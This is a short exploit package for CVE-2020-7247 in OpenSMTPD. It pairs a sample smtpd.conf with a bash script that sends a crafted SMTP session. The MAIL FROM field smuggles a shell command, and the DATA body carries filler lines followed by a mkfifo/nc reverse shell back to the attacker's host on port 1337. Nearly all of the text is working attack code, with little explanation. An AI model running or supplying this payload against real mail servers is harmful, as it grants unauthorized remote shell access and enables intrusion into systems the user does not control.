Exploits CVE-2020-7247 for an lmtp configuration

smtpd.conf

table aliases file:/etc/mail/aliases

listen on all

action "local_mail" lmtp some-lmtp.server
action "outbound" relay

match from any for domain "example.org" action "local_mail"
match for local action "local_mail"
match for any action "outbound"

unpriv.sh

#!/bin/bash

if [ $# -eq 0 ]; then
    >&2 echo "Usage: $0 ADDR [PORT]"
    exit 1
elif [ $# -eq 1 ]; then
    SERVER_ADDR="$1"
    PORT=25
elif [ $# -eq 2 ]; then
    SERVER_ADDR="$1"
    PORT="$2"
fi

LOCAL_ADDR=$(ip -4 addr show virbr0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
LOCAL_PORT=1337

read -p "Will try to open reverse shell to $LOCAL_ADDR:$LOCAL_PORT, correct? [y]/n " yn
if [ "$yn" = "n" -o "$yn" = "N" ]; then
    exit 1
fi

echo "Connecting to $SERVER_ADDR:$PORT ..."
(
    sleep 1; echo 'HELO alice'
    sleep 1; echo 'MAIL FROM:<";for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;true ">'
    sleep 1; echo 'RCPT TO:<[email protected]>'
    sleep 1; echo 'DATA'
    sleep 1; cat <<EOF

# NOP SLIDE: 0
# NOP SLIDE: 1
# NOP SLIDE: 2
# NOP SLIDE: 3
# NOP SLIDE: 4
# NOP SLIDE: 5
# NOP SLIDE: 6
# NOP SLIDE: 7
# NOP SLIDE: 8
# NOP SLIDE: 9
# NOP SLIDE: a
# NOP SLIDE: b
# NOP SLIDE: c
# NOP SLIDE: d

fifo=\$(mktemp -u)
mkfifo "\$fifo"
cat "\$fifo" | /bin/sh -i 2>&1 | nc $LOCAL_ADDR $LOCAL_PORT > "\$fifo"
.
EOF
    sleep 1; echo 'QUIT'
) | tee >(sed -e 's/^/> /' >/dev/tty) | nc "$SERVER_ADDR" "$PORT" | sed -e 's/^/< /'